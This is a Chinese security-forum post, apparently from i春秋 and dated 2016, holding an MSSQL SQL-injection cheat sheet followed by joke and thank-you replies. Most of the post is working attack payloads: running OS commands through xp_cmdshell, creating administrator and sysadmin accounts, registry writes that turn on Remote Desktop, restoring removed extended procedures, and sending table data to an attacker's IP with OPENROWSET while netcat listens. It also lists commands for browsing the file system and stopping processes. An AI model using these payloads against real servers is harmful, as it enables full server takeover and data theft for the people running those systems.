用户
搜索
  • TA的每日心情
    奋斗
    2016-10-3 10:06
  • 签到天数: 11 天

    连续签到: 1 天

    [LV.3]经常看看I

    i春秋-核心白帽

    Rank: 4

    29

    主题

    263

    帖子

    631

    魔法币
    收听
    6
    粉丝
    15
    注册时间
    2015-12-27

    春秋文阁幽默灌水王

    QQ
    发表于 2016-1-30 16:29:24 1348479
    ①、是否存在xp_cmdshell

    and 1=(select count(*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell')

    ②、用xp_cmdshell执行命令

    ;exec master..xp_cmdshell "net user name password /add"--
    ;exec master..xp_cmdshell "net localgroup name administrators /add"--

    ③、查看权限

    and (select IS_SRVROLEMEMBER('sysadmin'))=1--  //sa
    and (select IS_MEMBER('db_owner'))=1--   //  dbo
    and (select IS_MEMBER('public'))=1--  //public

    ④、创建个登陆mssql的帐号

    ;exec master.dbo.sp_addlogin name,pass;--

    ⑤、把创建的mssql登陆帐号提升到sysadmin

    ;exec master.dbo.sp_addsrvrolemember name,sysadmin;--

    ⑥、开3389

    'exec master..xp_regwrite @r,'software\microsoft\windows\currentversion\netcache','enable','reg_sz','0';----
    ;declare @r varchar(255) set @r='HKEY_LOCAL_MACHINE'exec master..xp_regwrite @r,'software\microsoft\windows nt\currentversion\winlogon','shutdownwithoutlogon','reg_sz','0';----
    ;declare @r varchar(255) set @r='HKEY_LOCAL_MACHINE'exec master..xp_regwrite @r,'software\policies\microsoft\windows\installer','enableadmintsremote','reg_dword',1;----
    ;declare @r varchar(255) set @r='HKEY_LOCAL_MACHINE'exec master..xp_regwrite @r,'system\currentcontrolset\control\terminal server','Tsenabled','reg_dword',1;----
    ;declare @r varchar(255) set @r='HKEY_LOCAL_MACHINE'exec master..xp_regwrite @r,'system\currentcontrolset\services\termdd','start','reg_dword',2;----
    ;declare @r varchar(255) set @r='HKEY_LOCAL_MACHINE'exec master..xp_regwrite @r,'system\currentcontrolset\services\termservice','start','reg_dword',2;----
    ;declare @r varchar(255) set @r='HKEY_LOCAL_MACHINE'exec master..xp_regwrite 'hkey_users','.default\keyboard layout\toggle','hotkey','reg_sz','1';----
    ;declare @r varchar(255) set @r='HKEY_LOCAL_MACHINE'exec master..xp_cmdshell 'iisreset /reboot';----



    ⑦、xp_cmdshell的删除及恢复

    1、恢复xp_cmdshell的方法   
    删除扩展存储过过程xp_cmdshell的语句   
    exec sp_dropextendedproc ’xp_cmdshell’  

    2、恢复cmdshell的sql语句   
    exec sp_addextendedproc xp_cmdshell ,@dllname =’xplog70.dll’  

    exec master.dbo.addextendedproc ’xp_cmdshell’,’xplog70.dll’;select count(*) from master.dbo.sysobjects where xtype=’x’ and   
    返回结果为1就ok  

    否则需上传c:\inetput\web\xplog70.dll后   
    exec master.dbo.sp_addextendedproc ’xp_cmdshell’,’c:\inetput\web\xplog70.dll’;--  

    3、如果是用以下方法删除   
    drop procedure sp_addextendedproc   
    drop procedure sp_oacreate   
    exec sp_dropextendedproc ’xp_cmdshell’  

    则可以用以下语句恢复   
    dbcc addextendedproc ("sp_oacreate","odsole70.dll")   
    dbcc addextendedproc ("xp_cmdshell","xplog70.dll")   
    这样可以直接恢复,不用去管sp_addextendedproc是不是存在



    ⑧、在db权限并且分离获取mssql数据库服务器ip的方法

    1.本地nc监听  nc -vvlp 80

    2.;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=xxx;Network=DBMSSOCN;Address=你的ip,80;', 'select * from dest_table') select * from src_table;--



    ⑨、Mssql扩展相关

    --获得MS SQL的版本号  //mssql版本
    execute master..sp_msgetversion   // dbo public

    --得到硬盘文件信息             //dbo public
    --参数说明:目录名,目录深度,是否显示文件 //读取磁盘目录和文件
    execute master..xp_dirtree 'c:' //列出所有c:\文件和目录,子目录
    execute master..xp_dirtree 'c:',1 //只列c:\文件夹
    execute master..xp_dirtree 'c:',1,1 //列c:\文件夹加文件

    --列出服务器上所有windows本地组
    execute master..xp_enumgroups //dbo

    --得到当前sql server服务器的计算机名称 //获得计算机名   
    execute master..xp_getnetname   //dbo public

    --列出指定目录的所有下一级子目录
    EXEC [master].[dbo].[xp_subdirs] 'c:\WINNT' //可以列目录

    --列出服务器上固定驱动器,以及每个驱动器的可用空间
    execute master..xp_fixeddrives   //dbo public

    --显示系统上可用的盘符
    execute master..xp_availablemedia   //dbo

    --获取某文件的相关属性
    execute master..xp_getfiledetails 'C:1.txt'  //dbo public

    --统计数据库里每个表的详细情况
    exec sp_MSforeachtable 'sp_spaceused ''?''' //查询表 //dbo public

    --获得每个表的记录数和容量
    exec sp_MSforeachtable 'select ''?''','?', 'sp_spaceused ''?''', 'SELECT count(*) FROM ? '  //dbo pubilc

    --更新Table1/Table2中note列为NULL的值
    sp_MSforeachtable 'Update ? Set note='''' Where note is null',null,null,null,' AND o.name in (''Table1'',''Table2'')

    --列出服务器域名
    xp_ntsec_enumdomains //机器名 //dbo public

    --停止或者启动某个服务
    xp_servicecontrol 'stop','schedule' //schedule是服务得名称  //dbo

    --用pid来停止某个执行中的程序
    xp_terminate_process 123 //123是pid //dbo

    --只列某个目录下的子目录
    dbo.xp_subdirs 'C:' //dbo

    --服务器安全模式信息
    xp_loginconfig  //dbo


    xp_regaddmultistring
    xp_regdeletekey
    xp_regdeletevalue
    xp_regenumkeys
    xp_regenumvalues
    xp_regread
    xp_regremovemultistring
    xp_regwrite

    --将新扩展存储过程的名称注册到 Microsoft? SQL Server? 上。
    sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll' //恢复xp_cmdshell

    恢复过程sp_addextendedproc 如下:
    create procedure sp_addextendedproc --- 1996/08/30 20:13
    @functname nvarchar(517),/* (owner.)name of function to call */
    @dllname varchar(255)/* name of DLL containing function */
    as
    set implicit_transactions off
    if @@trancount > 0
    begin
    raiserror(15002,-1,-1,'sp_addextendedproc')
    return (1)
    end
    dbcc addextendedproc( @functname, @dllname)
    return (0) -- sp_addextendedproc

    创建新的 Microsoft? SQL Server? 登录//只有 sysadmin 和 securityadmin 固定服务器角色的成员才可以执行 sp_addlogin。





    补丁版本
       其中的8.00.760就是SQL Server的版本和补丁号。对应关系如下:


        8.00.194 -——————SQL Server 2000 RTM
        8.00.384 -——————(SP1)
        8.00.534 -——————(SP2)
        8.00.760 -——————(SP3) psb.jpg


    本帖被以下淘专辑推荐:

    任何输出都是有害的
    发表于 2016-1-30 16:30:06
    本人郑重声明:
    1.本人是文盲,以上内容文字均不认识,也看不懂是什么意思.

    2.本人过去、现在以及将来都不认识楼主,且自古以来与楼主无利益关系。楼主表述之事与本人无关,

    只是本着“看贴(虽然看不懂)回贴,利人利己的中华民族优秀传统美德”,顺便赚点积分。
    3.
    本人在此留言均为网络上复制,用于检验本人电脑键盘录入、屏幕显示的机械、光电性能。
    并不代表本人局部或全部同意、支持或者反对楼主观点。
    4.
    如本人留言违反国家有关法律,请网络管理员及时删除本人跟贴。本回贴不暗示、鼓励、

    支持或映射读者作出生活方式、工作态度、婚姻交友、子女教育的积极或消极判断。
    5.
    因删贴不及时所产生的任何法律(包括宪法,民法,刑法,书法,公检法,基本法,劳动法,

    婚姻法,输入法,没办法,国际法,今日说法,吸星大法,与台湾关系法及文中涉及或
    可能涉及以及未涉及之法,各地治安管理条例)纠纷或责任本人概不负责。

    6. 综上所述,恳请各位官员请勿动用武装力量请勿跨村、跨镇、跨市、跨省、跨国、跨洲、跨星球、

    跨银河系追捕。确因不抓不足以平民愤,或不抓就领不到薪水养家户口的公职人员,建议携带工作证、

    身份证、结婚证/离婚证、独生子女证、健康证、暂住证、毕业证、边防证、
    县以上gov
    机关出具的介绍信温情操作,轻拿轻放。抓捕按照以下排序之倒序:楼主、
    原作者以及网络管理员以及网络运行商、电信运营商、电力供应商、电脑生产销售商。

    7. 此声明最终解释权归本人所有。
    Hacking the earth.My Blog:https://isbase.cc
    使用道具 举报 回复
    坏蛋 管理员 欢迎大家来春秋群找我玩
    板凳
    发表于 2016-1-30 16:30:21
    标准的姿势做沙发
    欢迎加入i春秋QQ群大家庭,每人只能任选加入一个群哦!
    投稿请加QQ:780876774。

    i春秋—楚:713729706
    i春秋—魏:687133802
    网安交流群:820783253
    使用道具 举报 回复
    坏蛋 管理员 欢迎大家来春秋群找我玩
    地板
    发表于 2016-1-30 16:30:58
    zusheng 发表于 2016-1-30 16:30
    本人郑重声明:
    1.本人是文盲,以上内容文字均不认识,也看不懂是什么意思.

    。。。。。。。。。。。。。。你是我沙发的竞争对手
    欢迎加入i春秋QQ群大家庭,每人只能任选加入一个群哦!
    投稿请加QQ:780876774。

    i春秋—楚:713729706
    i春秋—魏:687133802
    网安交流群:820783253
    使用道具 举报 回复
    发表于 2016-1-30 16:36:17
    yyyxy 发表于 2016-1-30 16:30
    。。。。。。。。。。。。。。你是我沙发的竞争对手

    哈哈,只是快了一步。下次有快点啦
    Hacking the earth.My Blog:https://isbase.cc
    使用道具 举报 回复
    发表于 2016-1-30 18:05:38
    1111111111111111111111111111
    QQ图片20160129115510.jpg
    任何输出都是有害的
    使用道具 举报 回复
    发表于 2016-2-2 20:09:32
    学习了,谢谢LZ分享
    hello world
    使用道具 举报 回复
    发表于 2016-8-22 22:22:25
    666666666
    使用道具 举报 回复
    发表于 2016-10-2 22:54:54
    使用道具 举报 回复
    脚印记录。
    使用道具 举报 回复
    发表于 2017-10-19 16:25:49
    收藏,之后应该会用到@
    使用道具 举报 回复
    发表于 2018-10-1 18:04:34
    学习一下~
    使用道具 举报 回复
    发表于 2019-11-25 11:10:15
    评论一下,证明我已经看过这篇文章啦
    使用道具 举报 回复
    感谢大佬分享!!!
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册